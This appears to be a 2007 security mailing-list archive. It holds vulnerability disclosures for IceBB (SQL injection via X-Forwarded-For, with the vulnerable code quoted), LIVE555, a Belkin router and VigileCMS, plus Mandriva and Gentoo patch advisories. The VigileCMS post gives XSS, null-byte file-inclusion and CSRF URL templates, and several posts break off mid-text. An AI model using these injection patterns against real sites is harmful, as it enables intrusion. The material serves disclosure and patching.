-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQKbHuhJ+ozIKI5gRAl/iAJ0XNSINVi0zD5q+JKbQ1EGR

IceBB 1.0rc6 <= Remote SQL Injection

[aeroxteam-nospam]

[|Description:|]

A security breach has been discoverd in IceBB 1.0-rc6.

This breach is caused by a bad filtering of the X-Forwarded-For variable:


> ./includes/functions.php, line 73

$ip  = empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['REMOTE_ADDR'] : 
$_SERVER['HTTP_X_FORWARDED_FOR'];

$ip = $this->clean_key($ip);

$input['ICEBB_USER_IP'] = $ip;


> ./icebb.php, line 169

$icebb->client_ip   = $input['ICEBB_USER_IP'];


> ./admin/index.php, line 112

$icebb->adsess  = $db->fetch_result("SELECT adsess.*,u.id as 
userid,u.username,u.temp_ban,g.g_view_board FROM icebb_adsess AS adsess LEFT 
JOIN icebb_users AS u ON u.username=adsess.user LEFT JOIN icebb_groups AS g ON 
u.user_group=g.gid WHERE adsess.asid='{$icebb->input['s']}' AND 
adsess.ip='{$icebb->client_ip}' LIMIT 1");


A hacker could exploit this security breach in order to alter a SQL request.


[|Exploit:|]

http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.php


[|Solution:|]

No one. Think about update your forum core when a patch will be available on 
the official website.


[|Credits:|]

Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)

for AeroX (AeroXteam.fr)


[|Greetz:|]

Math², KERNEL_ERROR, NeoMorphS, Snake91, Goundy, Alkino (...) And everybody 
from #aerox

Crash in LIVE555 Media Server 2007.11.01

[Luigi Auriemma]

###

 Luigi Auriemma

Application:  LIVE555 Media Server
  http://www.live555.com/mediaServer/
Versions: <= 2007.11.01
Platforms:*nix, Windows, Mac and others
Bug:  crash caused by access to unallocated memory
Exploitation: remote, versus server
Date: 18 Nov 2007
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


LIVE555 Media Server is an open source RTSP server application released
under LGPL.


###

==
2) Bug
==


The function which handles the incoming queries from the clients is
affected by a vulnerability which allows an attacker to crash the
server remotely using the smallest RTSP query possible to use.

This problem is caused by the absence of an instruction for checking if
the amount of client's data (reqStrSize) is longer or equal than 8
bytes because the function makes use of unsigned numbers, so "7 - 8" is
not -1 but 4294967295, resulting in a crash caused by the reaching of
the end of the allocated memory.

>From liveMedia/RTSPCommon:

Boolean parseRTSPRequestString(char const* reqStr,
   unsigned reqStrSize,
  ...
  unsigned i;
  for (i = 0; i < resultCmdNameMaxSize-1 && i < reqStrSize; ++i) {

...

  // Skip over the prefix of any "rtsp://" or "rtsp:/" URL that follows:
  unsigned j = i+1;
  while (j < reqStrSize && (reqStr[j] == ' ' || reqStr[j] == '\t')) ++j;
  for (j = i+1; j < reqStrSize-8; ++j) {
...


###

===
3) The Code
===


http://aluigi.org/poc/live555x.zip


###

==
4) Fix
==


Version 2007.11.18


###


--- 
Luigi Auriemma
http://aluigi.org

[ MDKSA-2007:225 ] - Updated net-snmp packages fix remote denial of service vulnerability

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:225
 http://www.mandriva.com/security/
 ___
 
 Package : net-snmp
 Date: November 19, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0,
   Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 The SNMP agent in net-snmp 5.4.1 and earlier allows remote attackers to
 cause a denial of service (CPU and memory consumption) via a GETBULK
 request with a large max-repeaters value.
 
 Updated packages fix this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5846
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 83e0d0edc66af5d11b032cf2a7c12054  
2007.0/i586/libnet-snmp10-5.3.1-2.1mdv2007.0.i586.rpm
 211db38ffbbefb22f653a18da8e928f5  
2007.0/i586/libnet-snmp10-devel-5.3.1-2.1mdv2007.0.i586.rpm
 b43cc33ca2b0fb582e69bbe52578e76a  
2007.0/i586/libnet-snmp10-static-devel-5.3.1-2.1mdv2007.0.i586.rpm
 e2ac837cd1eff29bb56f5fa964f59ed5  
2007.0/i586/net-snmp-5.3.1-2.1mdv2007.0.i586.rpm
 2434602e5d0a3133318600b4071cf4ea  
2007.0/i586/net-snmp-mibs-5.3.1-2.1mdv2007.0.i586.rpm
 d9336d2710c1a44531cdb790cd8f47cf  
2007.0/i586/net-snmp-trapd-5.3.1-2.1mdv2007.0.i586.rpm
 a1945889589568b420181a8a196d51ad  
2007.0/i586/net-snmp-utils-5.3.1-2.1mdv2007.0.i586.rpm
 cf8fd2357e80a805ab3210fd3a8f8d01  
2007.0/i586/perl-NetSNMP-5.3.1-2.1mdv2007.0.i586.rpm 
 da66327183a153d054bbc5d70fde958c  
2007.0/SRPMS/net-snmp-5.3.1-2.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 7a4a25157d9a1e3b9cf4bf7af1205aa8  
2007.0/x86_64/lib64net-snmp10-5.3.1-2.1mdv2007.0.x86_64.rpm
 cab6a3e8bc7167656e38e5a429eb8c0a  
2007.0/x86_64/lib64net-snmp10-devel-5.3.1-2.1mdv2007.0.x86_64.rpm
 03f09f4fe99c381bda2603861f9644a2  
2007.0/x86_64/lib64net-snmp10-static-devel-5.3.1-2.1mdv2007.0.x86_64.rpm
 425489fcb707757a46e0c6105309e2ff  
2007.0/x86_64/net-snmp-5.3.1-2.1mdv2007.0.x86_64.rpm
 7df1fa9a564c63687621355561ba9eec  
2007.0/x86_64/net-snmp-mibs-5.3.1-2.1mdv2007.0.x86_64.rpm
 fe2aaae5507ae5122a7d30f9fd74eef5  
2007.0/x86_64/net-snmp-trapd-5.3.1-2.1mdv2007.0.x86_64.rpm
 ee1ae1d56af4b511b3bb2b1a986aa60a  
2007.0/x86_64/net-snmp-utils-5.3.1-2.1mdv2007.0.x86_64.rpm
 04393ea88742f3b05586a555d8ad81ec  
2007.0/x86_64/perl-NetSNMP-5.3.1-2.1mdv2007.0.x86_64.rpm 
 da66327183a153d054bbc5d70fde958c  
2007.0/SRPMS/net-snmp-5.3.1-2.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 fa0f200cd711f97684d9debfdeef3e15  
2007.1/i586/libnet-snmp10-5.3.1-3.1mdv2007.1.i586.rpm
 68c25bedfd4370a5fc0aa5ff934a2b1b  
2007.1/i586/libnet-snmp10-devel-5.3.1-3.1mdv2007.1.i586.rpm
 ecbd2c76a1ea3595594f10c66bea5772  
2007.1/i586/libnet-snmp10-static-devel-5.3.1-3.1mdv2007.1.i586.rpm
 04c676ae1290bbfbd7083252ae5b10dd  
2007.1/i586/net-snmp-5.3.1-3.1mdv2007.1.i586.rpm
 2a6c6befd5958c7c9c946d2189d2f128  
2007.1/i586/net-snmp-mibs-5.3.1-3.1mdv2007.1.i586.rpm
 5cd1e27c1af30157ead213324c440527  
2007.1/i586/net-snmp-trapd-5.3.1-3.1mdv2007.1.i586.rpm
 423682a7f455940da49272647925838e  
2007.1/i586/net-snmp-utils-5.3.1-3.1mdv2007.1.i586.rpm
 1ca18897188b7a34d98b146d65746477  
2007.1/i586/perl-NetSNMP-5.3.1-3.1mdv2007.1.i586.rpm 
 f2a3a8df265da917384a4c0916b330a6  
2007.1/SRPMS/net-snmp-5.3.1-3.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 9cdea571a84945accd6d38527b1bedb5  
2007.1/x86_64/lib64net-snmp10-5.3.1-3.1mdv2007.1.x86_64.rpm
 8352cb8ef1fac035ea009d696e1d5837  
2007.1/x86_64/lib64net-snmp10-devel-5.3.1-3.1mdv2007.1.x86_64.rpm
 5e54dd10e2f97bd2ee23f0a715ef734e  
2007.1/x86_64/lib64net-snmp10-static-devel-5.3.1-3.1mdv2007.1.x86_64.rpm
 3187463725a5b015d3f507ac4a723160  
2007.1/x86_64/net-snmp-5.3.1-3.1mdv2007.1.x86_64.rpm
 638d8c0a5d4be46ee1b9c2640ed7a061  
2007.1/x86_64/net-snmp-mibs-5.3.1-3.1mdv2007.1.x86_64.rpm
 c4f41ebf9bf64dfc5236bb935ee16c31  
2007.1/x86_64/net-snmp-trapd-5.3.1-3.1mdv2007.1.x86_64.rpm
 734133a9a7a860f90b76c8bd72a0ddd0  
2007.1/x86_64/net-snmp-utils-5.3.1-3.1mdv2007.1.x86_64.rpm
 b1f5da81f1c27888df5ba8f71279fb05  
2007.1/x86_64/perl-NetSNMP-5.3.1-3.1mdv2007.1.x86_64.rpm 
 f2a3a8df265da917384a4c0916b330a6  
2007.1/SRPMS/net-snmp-5.3.1-3.1mdv2007.1.src.rpm

 Corporate 3.0:
 748009feee8a9d4d904b7e77537ff791  
corporate/3.0/i586/libnet-snmp5-5.1-7.3.C30mdk.i586.rpm
 8ca0b75c8ec8e0839ae37335b04629ab  
corporate/3.0/i586/libnet-snmp5-devel-5.1-7.3.C30mdk.i586.rpm
 a0c2d416faa87c016826b5f8616c3af3  
corporate/3.0/i586/libnet-snmp5-static-devel-5.1-7.3.C30mdk.i586.rpm
 99659604d3f40d23179b2b3138178e41  
corporate/3.0/i586/net-snmp-5.1-7.3.C30mdk.i586.rpm
 3f9e8c99d31dd0dd0d3e5364325370ac  
corporate/3.0/i586/net-snmp-mibs-5.1-7.3.C30mdk.i586.rpm
 6bf842fa5664b91

Belkin Wireless G Router DoS

[r00t]

#ATI security Group has discovered a Denial of Service Vulnerability in the 
Belkin Wireless G Router's.


#Vulnerability: Denial of Service (SYN FLOOD)


#Simple Dork: http://RouterIp (DoS SYN FLOOD on ROUTER)


#Vulnerable Product; Belkin Wireless G Router

Router Model #F5D7230-4


#Tested on; Belkin Wireless G F5D7230-4


#Additional Information: This router is vulnerable to SYN flood attacks, This 
attack also causes a chain reaction Denial of Service on the logging system 
log.stm by flooding the logging system with information causing it overloads 
itself and not log all other activity.

VigileCMS 1.4 Multiple Remote Vulnerabilities

[info]

VigileCMS 1.4 Multiple Remote Vulnerabilities

---

---

   Author : DevilAuron (http://devilsnight.altervista.org)


   Vendor : VigileCMS 1.4

   Date   : [16-11-2007] (dd-mm-)



Permanent Xss:

---

http://[site]/[path]/index.php?module=vedipm&inviapm=true

http://[site]/[path]/index.php?module=live_chat

Insert on the message the xss



Local File Inclusion:

---

http://[site]/[path]/index.php?module=[somefile]%00



CSRF:

---

http://127.0.0.1/VIGILE_1.4/index.php?module=changepass";>









document.cambia.submit()




---

[ GLSA 200711-21 ] Bochs: Multiple vulnerabilities

[Pierre-Yves Rofes]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Bochs: Multiple vulnerabilities
  Date: November 17, 2007
  Bugs: #188148
ID: 200711-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities have been discovered in Bochs, possibly
allowing for the execution of arbitrary code or a Denial of Service.

Background
==

Bochs is a IA-32 (x86) PC emulator written in C++.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  app-emulation/bochs< 2.3   >= 2.3

Description
===

Tavis Ormandy of the Google Security Team discovered a heap-based
overflow vulnerability in the NE2000 driver (CVE-2007-2893). He also
discovered a divide-by-zero error in the emulated floppy disk
controller (CVE-2007-2894).

Impact
==

A local attacker in the guest operating system could exploit these
issues to execute code outside of the virtual machine, or cause Bochs
to crash.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Bochs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-emulation/bochs-2.3"

References
==

  [ 1 ] CVE-2007-2893
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2893
  [ 2 ] CVE-2007-2894
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2894

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-21.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHP4AduhJ+ozIKI5gRAoGsAJ9eTHVtsnVWsAII4m9eSnmobPGyLQCfcQqf
ktlcEcQo/3p6PbW4BrKZlxI=
=lCTl
-END PGP SIGNATURE-

[ GLSA 200711-23 ] VMware Workstation and Player: Multiple vulnerabilities

[Pierre-Yves Rofes]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: VMware Workstation and Player: Multiple vulnerabilities
  Date: November 18, 2007
  Bugs: #193196
ID: 200711-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


VMware guest operating systems might be able to execute arbitrary code
with elevated privileges on the host operating system through multiple
flaws.

Background
==

VMware Workstation is a virtual machine for developers and system
administrators. VMware Player is a freeware virtualization software
that can run guests produced by other VMware products.

Affected packages
=

---
 Package /Vulnerable/   Unaffected
---
  1  vmware-workstation  < 6.0.1.55017 *>= 5.5.5.56455
>= 6.0.1.55017
  2  vmware-player   < 2.0.1.55017 *>= 1.0.5.56455
>= 2.0.1.55017
---
 2 affected packages on all of their supported architectures.
---

Description
===

Multiple vulnerabilities have been discovered in several VMware
products. Neel Mehta and Ryan Smith (IBM ISS X-Force) discovered that
the DHCP server contains an integer overflow vulnerability
(CVE-2007-0062), an integer underflow vulnerability (CVE-2007-0063) and
another error when handling malformed packets (CVE-2007-0061), leading
to stack-based buffer overflows or stack corruption. Rafal Wojtczvk
(McAfee) discovered two unspecified errors that allow authenticated
users with administrative or login privileges on a guest operating
system to corrupt memory or cause a Denial of Service (CVE-2007-4496,
CVE-2007-4497). Another unspecified vulnerability related to untrusted
virtual machine images was discovered (CVE-2007-5617).

VMware products also shipped code copies of software with several
vulnerabilities: Samba (GLSA-200705-15), BIND (GLSA-200702-06), MIT
Kerberos 5 (GLSA-200707-11), Vixie Cron (GLSA-200704-11), shadow
(GLSA-200606-02), OpenLDAP (CVE-2006-4600), PAM (CVE-2004-0813,
CVE-2007-1716), GCC (CVE-2006-3619) and GDB (CVE-2006-4146).

Impact
==

Remote attackers within a guest system could possibly exploit these
vulnerabilities to execute code on the host system with elevated
privileges or to cause a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All VMware Workstation users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=app-emulation/vmware-workstation-5.5.5.56455"

All VMware Player users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=app-emulation/vmware-player-1.0.5.56455"

References
==

  [ 1 ] CVE-2004-0813
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0813
  [ 2 ] CVE-2006-3619
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3619
  [ 3 ] CVE-2006-4146
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4146
  [ 4 ] CVE-2006-4600
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4600
  [ 5 ] CVE-2007-0061
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0061
  [ 6 ] CVE-2007-0062
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062
  [ 7 ] CVE-2007-0063
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0063
  [ 8 ] CVE-2007-1716
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1716
  [ 9 ] CVE-2007-4496
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4496
  [ 10 ] CVE-2007-4497
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4497
  [ 11 ] CVE-2007-5617
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5617
  [ 12 ] GLSA-200606-02
 http://www.gentoo.org/security/en/glsa/glsa-200606-02.xml
  [ 13 ] GLSA-200702-06
 http://www.gentoo.org/security/en/glsa/glsa-200702-06.xml
  [ 14 ] GLSA-200704-11
 http://www.gentoo.org/security/en/glsa/glsa-200704-11.xml
  [ 15 ] GLSA-200705-15
 http://www.gentoo.org/security/en/glsa/glsa-200705-15.xml
  [ 16 ] GLSA-200707-11
 http://www.gentoo.org/security/en/glsa/glsa-200707-11.xml
  [ 17 ] VMSA-2007-0006

http://list

[ GLSA 200711-27 ] Link Grammar: User-assisted execution of arbitrary code

[Pierre-Yves Rofes]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-27
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Link Grammar: User-assisted execution of arbitrary code
  Date: November 18, 2007
  Bugs: #196803
ID: 200711-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow vulnerability has been discovered in Link Grammar.

Background
==

The Link Grammar parser is a syntactic parser of English, based on link
grammar, an original theory of English syntax.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  dev-libs/link-grammar < 4.2.4-r1  >= 4.2.4-r1

Description
===

Alin Rad Pop from Secunia Research discovered a boundary error in the
function separate_sentence() in file tokenize.c when processing an
overly long word which might lead to a stack-based buffer overflow.

Impact
==

A remote attacker could entice a user to parse a specially crafted
sentence, resulting in the remote execution of arbitrary code with the
privileges of the user running the application. Note that this
vulnerability may be triggered by an application using Link Grammar to
parse sentences (e.g. AbiWord).

Workaround
==

There is no known workaround at this time.

Resolution
==

All Link Grammar users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=dev-libs/link-grammar-4.2.4-r1"

References
==

  [ 1 ] CVE-2007-5395
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5395

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-27.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQMZauhJ+ozIKI5gRAnveAJ4xF3udOAcBALkj2nx+sLtpProAQwCfYMtX
4y5wv2ftAZ6PDwA0/uaInlg=
=p0Qn
-END PGP SIGNATURE-

[ GLSA 200711-25 ] MySQL: Denial of Service

[Pierre-Yves Rofes]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: MySQL: Denial of Service
  Date: November 18, 2007
  Bugs: #198988
ID: 200711-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A Denial of Service vulnerability was found in MySQL.

Background
==

MySQL is a popular multi-threaded, multi-user SQL server.

Affected packages
=

---
 Package   /   Vulnerable   /   Unaffected
---
  1  dev-db/mysql  < 5.0.44-r2>= 5.0.44-r2

Description
===

Joe Gallo and Artem Russakovskii reported an error in the
convert_search_mode_to_innobase() function in ha_innodb.cc in the
InnoDB engine that is leading to a failed assertion when handling
CONTAINS operations.

Impact
==

A remote authenticated attacker with ALTER privileges could send a
specially crafted request to a vulnerable database server possibly
leading to a Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All MySQL users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-db/mysql-5.0.44-r2"

References
==

  [ 1 ] CVE-2007-5925
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5925

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-25.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQLPVuhJ+ozIKI5gRAvNFAJwMO0s6m2J1Bcqq+ijMED9FAWgMewCZAVmB
lM7jI2TrO3q//snoBFgHL6U=
=OVzF
-END PGP SIGNATURE-

Re: [Full-disclosure] Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability

[jf]

is it? If I recall correctly, the hexview advisory was the result of
something like a word-to-byte truncation followed by a byte
sign-extension (but its been long enough that I may be misremembering
it)

In this advisory it was not entirely clear what
the condition was, from what I remember reading of it the other day, it
didn't get into how/why, it just like used ecx or a register as a counter
but didn't show how it came to that value?

Whats interesting is that the hexview patching the bug itself is trivial
from the assembly (not taking into account the work encountered from bin 
patching
itself) and I know many organizations attempted to put a lot of pressure
to get it patched and failed to do so

On Sun, 18 Nov 2007, Juha-Matti Laurio wrote:

> Date: Sun, 18 Nov 2007 01:58:02 +0200 (EET)
> From: Juha-Matti Laurio <[EMAIL PROTECTED]>
> To: CaseArmour.net Security Administrator <[EMAIL PROTECTED]>,
> bugtraq@securityfocus.com, [EMAIL PROTECTED],
> [EMAIL PROTECTED]
> Subject: Re: [Full-disclosure] Microsoft Jet Engine MDB File Parsing Stack
> Overflow Vulnerability
>
> There is a well-known unpatched code execution type vulnerability reported 
> originally in msjet40.dll version 4.00.8618.0 too.
> This issue reported by HexView is known since March 2005:
>
> http://www.securityfocus.com/bid/12960
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0944
>
> We probably don't see a fix for this issue.
>
> - Juha-Matti
>
> "CaseArmour.net Security Administrator" <[EMAIL PROTECTED]> kirjoitti:
> > It would be useful to know if this is also an issue with msjet40.dll
> > 4.0.9510.0 (Windows Server 2003 SP2 + hotfixes).  I have an installer
> > for Windows XP SP2 that -- seems -- to cleanly apply Windows Server 2003
> > SP2's MDAC 2.82.  I haven't been able to give it a serious, hard testing
> > because I don't have many apps that still use MDAC.
> >
> > On Fri, 16 Nov 2007 19:25:29 +0800, "cocoruder" <[EMAIL PROTECTED]>
> > said:
> > >
> > > (C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Vulnerability Hash Database - Maillist

[Sowhat]

Hi All

I have created a Google Groups named "Vulnerability Hash Database", for fun ;)

I think I do not need to explain more about what it is used for.

Welcome to post your hashes of vulnerability/POC to this list.

You can visit this maillist @ http://groups.google.com/group/vulnhashdb

To subscribe to this maillist, please send email to
[EMAIL PROTECTED]
or go to the following webpage:
http://groups.google.com/group/vulnhashdb/subscribe?hl=en

Comments and suggestions are welcome!

-- 
Sowhat
http://secway.org
"Life is like a bug, Do you know how to exploit it ?"

[ GLSA 200711-26 ] teTeX: Multiple vulnerabilities

[Pierre-Yves Rofes]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-26
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: teTeX: Multiple vulnerabilities
  Date: November 18, 2007
  Bugs: #198238
ID: 200711-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities have been discovered in teTeX, possibly
allowing to execute arbitrary code or overwrite arbitrary files.

Background
==

teTeX is a complete TeX distribution for editing documents.

Affected packages
=

---
 Package /   Vulnerable   / Unaffected
---
  1  app-text/tetex  < 3.0_p1-r6  >= 3.0_p1-r6

Description
===

Joachim Schrod discovered several buffer overflow vulnerabilities and
an insecure temporary file creation in the "dvilj" application that is
used by dvips to convert DVI files to printer formats (CVE-2007-5937,
CVE-2007-5936). Bastien Roucaries reported that the "dvips" application
is vulnerable to two stack-based buffer overflows when processing DVI
documents with long \href{} URIs (CVE-2007-5935). teTeX also includes
code from Xpdf that is vulnerable to a memory corruption and two
heap-based buffer overflows (GLSA 200711-22); and it contains code from
T1Lib that is vulnerable to a buffer overflow when processing an overly
long font filename (GLSA 200710-12).

Impact
==

A remote attacker could entice a user to process a specially crafted
DVI or PDF file which could lead to the execution of arbitrary code
with the privileges of the user running the application. A local
attacker could exploit the "dvilj" vulnerability to conduct a symlink
attack to overwrite arbitrary files.

Workaround
==

There is no known workaround at this time.

Resolution
==

All teTeX users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/tetex-3.0_p1-r6"

References
==

  [ 1 ] CVE-2007-5935
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5935
  [ 2 ] CVE-2007-5936
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5936
  [ 3 ] CVE-2007-5937
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5937
  [ 4 ] GLSA 200710-12
http://www.gentoo.org/security/en/glsa/glsa-200710-12.xml
  [ 5 ] GLSA 200711-22
http://www.gentoo.org/security/en/glsa/glsa-200711-22.xml

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-26.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQLzwuhJ+ozIKI5gRAuMZAJ40tEV0hf7XFRtCwJhjzwuJ/75oFgCfRMrI
bs1VAbnkmR5l9BS9vJviuDs=
=ECPJ
-END PGP SIGNATURE-

[ GLSA 200711-24 ] Mozilla Thunderbird: Multiple vulnerabilities

[Pierre-Yves Rofes]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Mozilla Thunderbird: Multiple vulnerabilities
  Date: November 18, 2007
  Bugs: #196481
ID: 200711-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities have been reported in Mozilla Thunderbird,
which may allow user-assisted arbitrary remote code execution.

Background
==

Mozilla Thunderbird is a popular open-source email client from the
Mozilla project.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  mozilla-thunderbird  < 2.0.0.9 >= 2.0.0.9
  2  mozilla-thunderbird-bin  < 2.0.0.9 >= 2.0.0.9
---
 2 affected packages on all of their supported architectures.
---

Description
===

Multiple vulnerabilities have been reported in Mozilla Thunderbird's
HTML browser engine (CVE-2007-5339) and JavaScript engine
(CVE-2007-5340) that can be exploited to cause a memory corruption.

Impact
==

A remote attacker could entice a user to read a specially crafted email
that could trigger one of the vulnerabilities, possibly leading to the
execution of arbitrary code.

Workaround
==

